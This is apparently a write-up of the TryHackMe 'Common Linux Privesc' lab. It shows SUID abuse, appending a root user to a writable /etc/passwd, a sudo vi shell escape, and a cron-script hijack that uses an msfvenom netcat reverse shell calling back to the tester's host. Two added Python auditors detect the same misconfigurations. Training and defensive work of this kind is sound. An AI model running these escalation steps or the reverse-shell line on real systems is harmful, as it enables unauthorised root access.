TryHackMe (THM): Common Linux Privesc Writeup

Probably the easiest privilege escalation room on TryHackMe.

I always struggle with privilege escalation, so I'm putting this writeup together partly as a review for myself.
To avoid spoilers, I try not to write the answers down directly.

Task 4 Enumeration

Using LinEnum

The room says it's a useful tool and you should keep it somewhere handy, so I do that (but I forget right away and end up downloading it again every time).

Enumerating with LinEnum

First, SSH in with the ID and password given in the room.

nmz@kali:~$ ssh user3@10.10.139.78
user3@polobox:~$

On the local machine, start a web server in the directory where LinEnum is stored.

nmz@kali:~/work/LinEnum$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

On the target machine, download LinEnum with wget and run it. Save the results to output.txt so they are easy to refer back to later.

user3@polobox:~$ wget 10.4.20.231:8000/LinEnum.sh
--2020-11-27 05:58:29--  http://10.4.20.231:8000/LinEnum.sh
Connecting to 10.4.20.231:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46631 (46K) [text/x-sh]
Saving to: ‘LinEnum.sh’

LinEnum.sh               100%[==================================>]  45.54K  56.5KB/s    in 0.8s    

2020-11-27 05:58:31 (56.5 KB/s) - ‘LinEnum.sh’ saved [46631/46631]

user3@polobox:~$ chmod +x LinEnum.sh
user3@polobox:~$ ./LinEnum.sh |tee output.txt

Reading the LinEnum results

Check the number of users

[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:117:Light Display Manager:/var/lib/lightdm:/bin/false
ntp:x:109:119::/home/ntp:/bin/false
avahi:x:110:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
colord:x:111:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false
nm-openconnect:x:114:124:NetworkManager OpenConnect plugin,,,:/var/lib/NetworkManager:/bin/false
nm-openvpn:x:115:125:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/bin/false
pulse:x:116:126:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:117:128:RealtimeKit,,,:/proc:/bin/false
saned:x:118:129::/var/lib/saned:/bin/false
usbmux:x:119:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
geoclue:x:103:105::/var/lib/geoclue:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
user1:x:1000:1000:user1,,,:/home/user1:/bin/bash
user2:x:1001:1001:user2,,,:/home/user2:/bin/bash
user3:x:1002:1002:user3,,,:/home/user3:/bin/bash
user4:x:1003:1003:user4,,,:/home/user4:/bin/bash
statd:x:120:65534::/var/lib/nfs:/usr/sbin/nologin
user5:x:1004:1004:user5,,,:/home/user5:/bin/bash
user6:x:1005:1005:user6,,,:/home/user6:/bin/bash
mysql:x:121:131:MySQL Server,,,:/var/mysql:/bin/bash
user7:x:1006:0:user7,,,:/home/user7:/bin/bash
user8:x:1007:1007:user8,,,:/home/user8:/bin/bash
sshd:x:122:65534::/run/sshd:/usr/sbin/nologin

Check the available shells

[-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash

Check cron

[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
*/5  *    * * * root    /home/user4/Desktop/autoscript.sh
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

Sensitive files we can read or write

[-] Can we read/write sensitive files:
-rw-rw-r-- 1 root root 2694 Mar  6  2020 /etc/passwd
-rw-r--r-- 1 root root 1087 Jun  5  2019 /etc/group
-rw-r--r-- 1 root root 581 Apr 22  2016 /etc/profile
-rw-r----- 1 root shadow 2359 Mar  6  2020 /etc/shadow

Task 5 Abusing SUID/GUID Files

Exploiting SUID/GUID files

Look at user3's home directory.
The file called shell is shown in red and stands out.

user3@polobox:~$ ls -l
total 180
drwxr-xr-x 2 user3 user3  4096 Jun  4  2019 Desktop
drwxr-xr-x 2 user3 user3  4096 Jun  4  2019 Documents
drwxr-xr-x 2 user3 user3  4096 Jun  4  2019 Downloads
-rwxrwxr-x 1 user3 user3 46631 Nov 27 05:46 LinEnum.sh
drwxr-xr-x 2 user3 user3  4096 Jun  4  2019 Music
-rw-rw-r-- 1 user3 user3 89918 Nov 27 06:01 output.txt
drwxr-xr-x 2 user3 user3  4096 Jun  4  2019 Pictures
drwxr-xr-x 2 user3 user3  4096 Jun  4  2019 Public
-rwsr-xr-x 1 root  root   8392 Jun  4  2019 shell
drwxr-xr-x 2 user3 user3  4096 Jun  4  2019 Templates
drwxr-xr-x 2 user3 user3  4096 Jun  4  2019 Videos

Running shell makes you root.
Even when it says Congratulations!, there is no sense of achievement at all...

Task 6 Exploiting Writeable /etc/passwd

Exploiting /etc/passwd
This assumes we already know that user7 is a member of the root group and therefore can apparently edit /etc/passwd.

Add a new user

Generate a password hash with the openssl command

user7@polobox:/home/user3$ openssl passwd -1 -salt new 123
$1$new$p7ptkEKU1HnaHpRtzNizS1

Write the new user on the last line of /etc/passwd

nano /etc/passwd
...
new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash

Save with Ctrl+X and log in as the new user
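As an added example that is not part of the room or this post: a defender-side check that parses /etc/passwd entries in the format LinEnum printed in Task 4 and flags exactly what this task abuses, namely a second UID 0 account, an account whose primary group is GID 0 (user7's situation), and a password hash sitting in the password field instead of `x`. The sample entries and the hash value are constructed.

```python
from __future__ import annotations
from dataclasses import dataclass

# Constructed sample modelled on the LinEnum /etc/passwd output above, plus the
# kind of line Task 6 appends (the hash is a placeholder, not a real credential).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
user3:x:1002:1002:user3,,,:/home/user3:/bin/bash
user7:x:1006:0:user7,,,:/home/user7:/bin/bash
new:$1$new$PLACEHOLDERHASHVALUE:0:0:root:/root:/bin/bash
"""

# Values in field 2 that mean "consult /etc/shadow" or "account locked".
SHADOWED_OR_LOCKED = {"x", "*", "!", "!!"}

@dataclass(frozen=True)
class Finding:
    user: str
    issue: str

def audit_passwd(text: str) -> list[Finding]:
    """Return one Finding per sign of /etc/passwd tampering in the given text."""
    findings: list[Finding] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(Finding(fields[0], f"line {lineno}: malformed entry with {len(fields)} fields"))
            continue
        name, pw, uid, gid, _gecos, _home, _shell = fields
        if pw == "":
            findings.append(Finding(name, "empty password field (login without a password)"))
        elif pw not in SHADOWED_OR_LOCKED:
            # A hash in this field is honoured directly, bypassing /etc/shadow.
            findings.append(Finding(name, "password hash stored in /etc/passwd"))
        if uid == "0" and name != "root":
            findings.append(Finding(name, "UID 0 account other than root"))
        if gid == "0" and name != "root":
            findings.append(Finding(name, "primary group is root (GID 0)"))
    return findings
```

Run it against the real file with `audit_passwd(open("/etc/passwd").read())`; a clean system returns an empty list.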

Task 7 Escaping Vi Editor

Privilege escalation using vi

Switch to user8 and check sudo

user8@polobox:/home/user7$ sudo -l
Matching Defaults entries for user8 on polobox:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User user8 may run the following commands on polobox:
    (root) NOPASSWD: /usr/bin/vi

We can see that sudo vi can be run without a password.

user8@polobox:/home/user7$ sudo vi

Open vi and, on that screen, type

:!sh

and when the screen comes back you are root. Amazing.

Task 8 Exploiting Crontab

Using autoscript.sh, which cron runs

Using msfvenom

# Show the help
nmz@kali:~/THM/CommonLinuxPrivesc$ msfvenom -help
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe

Options:
    -l, --list            <type>     List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
    -p, --payload         <payload>  Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
        --list-options               List --payload <value>'s standard, advanced and evasion options
    -f, --format          <format>   Output format (use --list formats to list)
    -e, --encoder         <encoder>  The encoder to use (use --list encoders to list)
        --service-name    <value>    The service name to use when generating a service binary
        --sec-name        <value>    The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
        --smallest                   Generate the smallest possible payload using all available encoders
        --encrypt         <value>    The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
        --encrypt-key     <value>    A key to be used for --encrypt
        --encrypt-iv      <value>    An initialization vector for --encrypt
    -a, --arch            <arch>     The architecture to use for --payload and --encoders (use --list archs to list)
        --platform        <platform> The platform for --payload (use --list platforms to list)
    -o, --out             <path>     Save the payload to a file
    -b, --bad-chars       <list>     Characters to avoid example: '\x00\xff'
    -n, --nopsled         <length>   Prepend a nopsled of [length] size on to the payload
        --pad-nops                   Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
    -s, --space           <length>   The maximum size of the resulting payload
        --encoder-space   <length>   The maximum size of the encoded payload (defaults to the -s value)
    -i, --iterations      <count>    The number of times to encode the payload
    -c, --add-code        <path>     Specify an additional win32 shellcode file to include
    -x, --template        <path>     Specify a custom executable file to use as a template
    -k, --keep                       Preserve the --template behaviour and inject the payload as a new thread
    -v, --var-name        <value>    Specify a custom variable name to use for certain output formats
    -t, --timeout         <second>   The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
    -h, --help                       Show this message


# Create the shell payload
nmz@kali:~/THM/CommonLinuxPrivesc$ msfvenom -p cmd/unix/reverse_netcat lhost=10.4.20.231 lport=8888 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 89 bytes
mkfifo /tmp/yflk; nc 10.4.20.231 8888 0</tmp/yflk | /bin/sh >/tmp/yflk 2>&1; rm /tmp/yflk

# Write the script msfvenom produced to a file with echo
nmz@kali:~/THM/CommonLinuxPrivesc$ echo 'mkfifo /tmp/yflk; nc 10.4.20.231 8888 0</tmp/yflk | /bin/sh >/tmp/yflk 2>&1; rm /tmp/yflk' > autoscript.sh
nmz@kali:~/THM/CommonLinuxPrivesc$ ls
autoscript.sh
nmz@kali:~/THM/CommonLinuxPrivesc$ cat autoscript.sh 
mkfifo /tmp/yflk; nc 10.4.20.231 8888 0</tmp/yflk | /bin/sh >/tmp/yflk 2>&1; rm /tmp/yflk

Place the file we created

Transfer it to the target machine following the same steps as for LinEnum.

user4@polobox:~/Desktop$ cp autoscript.sh bk_autoscript.sh
user4@polobox:~/Desktop$ ls
autoscript.sh     computer.desktop    network.desktop     settings.desktop
bk_autoscript.sh  helpmanual.desktop  recyclebin.desktop  userfiles.desktop
user4@polobox:~/Desktop$ wget 10.4.20.231:8000/autoscript.sh
--2020-11-29 22:12:02--  http://10.4.20.231:8000/autoscript.sh
Connecting to 10.4.20.231:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 90 [text/x-sh]
Saving to: ‘autoscript.sh.1’
autoscript.sh.1     100%[===================>]      90  --.-KB/s    in 0s     
2020-11-29 22:12:03 (13.6 MB/s) - ‘autoscript.sh.1’ saved [90/90]
user4@polobox:~/Desktop$ ls
autoscript.sh     computer.desktop    recyclebin.desktop
autoscript.sh.1   helpmanual.desktop  settings.desktop
bk_autoscript.sh  network.desktop     userfiles.desktop
user4@polobox:~/Desktop$ rm autoscript.sh
user4@polobox:~/Desktop$ cp autoscript.sh.1 autoscript.sh
user4@polobox:~/Desktop$ cat autoscript.sh
mkfifo /tmp/yflk; nc 10.4.20.231 8888 0</tmp/yflk | /bin/sh >/tmp/yflk 2>&1; rm /tmp/yflk

Then start nc on the local side and wait for the cron job, which runs once every 5 minutes.

nmz@kali:~/THM/CommonLinuxPrivesc$ nc -lvp 8888
listening on [any] 8888 ...
10.10.223.125: inverse host lookup failed: Unknown host
connect to [10.4.20.231] from (UNKNOWN) [10.10.223.125] 46966
whoami
root

The first time I tried, I waited and waited and never got a shell, but when I redid it from the start it worked. (Cause unknown.)

If anyone is stuck because it keeps failing, it might be worth trying a few times.
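An added example, not from the room or the original post, covering the two findings that made Tasks 5 and 8 possible from the defender's side: a setuid-root binary sitting in a home directory, and a root cron job whose script is owned or writable by a normal user. It parses constructed `ls -l` and /etc/crontab text in the same shape LinEnum printed, so it runs offline; on a real host you would feed it the output of `ls -l` for the paths that appear in the crontab.

```python
# Constructed `ls -l` lines modelled on what Tasks 5 and 8 found on the box.
SAMPLE_LISTING = """\
-rwsr-xr-x 1 root  root   8392 Jun  4  2019 /home/user3/shell
-rwsr-xr-x 1 root  root  59640 Mar 22  2019 /usr/bin/passwd
-rwxrwxr-x 1 user4 user4    90 Nov 29 22:12 /home/user4/Desktop/autoscript.sh
-rwxr-xr-x 1 root  root    321 Jun  4  2019 /usr/local/bin/backup.sh
"""

# Constructed /etc/crontab excerpt in the same shape LinEnum printed.
SAMPLE_CRONTAB = """\
# m h dom mon dow user  command
*/5 *  * * * root /home/user4/Desktop/autoscript.sh
17  *  * * * root cd / && run-parts --report /etc/cron.hourly
30  2  * * * root /usr/local/bin/backup.sh
"""

SYSTEM_DIRS = ("/bin/", "/sbin/", "/usr/", "/lib/", "/lib64/")

def parse_listing(text: str) -> dict[str, tuple[str, str]]:
    """Map path -> (mode, owner) for each `ls -l` line (9 whitespace-separated fields)."""
    entries = {}
    for line in text.splitlines():
        parts = line.split(None, 8)  # mode links owner group size mon day time name
        if len(parts) == 9:
            entries[parts[8]] = (parts[0], parts[2])
    return entries

def root_cron_targets(text: str) -> list[str]:
    """First word of the command for every root job in a system crontab."""
    targets = []
    for line in text.splitlines():
        parts = line.split(None, 6)  # five time fields, user, command
        if len(parts) == 7 and not parts[0].startswith("#") and parts[5] == "root":
            targets.append(parts[6].split()[0])
    return targets

def audit(listing: dict[str, tuple[str, str]], crontab: str) -> list[str]:
    """Flag the two misconfigurations the room exploits."""
    findings = []
    for path, (mode, owner) in listing.items():
        # mode[3] is the user execute slot; 's' or 'S' there means setuid.
        if mode[3] in "sS" and owner == "root" and not path.startswith(SYSTEM_DIRS):
            findings.append(f"{path}: setuid-root binary outside system directories")
    for path in root_cron_targets(crontab):
        entry = listing.get(path)
        # mode[5] and mode[8] are the group and other write slots.
        if entry and (entry[1] != "root" or entry[0][5] == "w" or entry[0][8] == "w"):
            findings.append(f"{path}: root cron job runs a file non-root users can modify")
    return findings
```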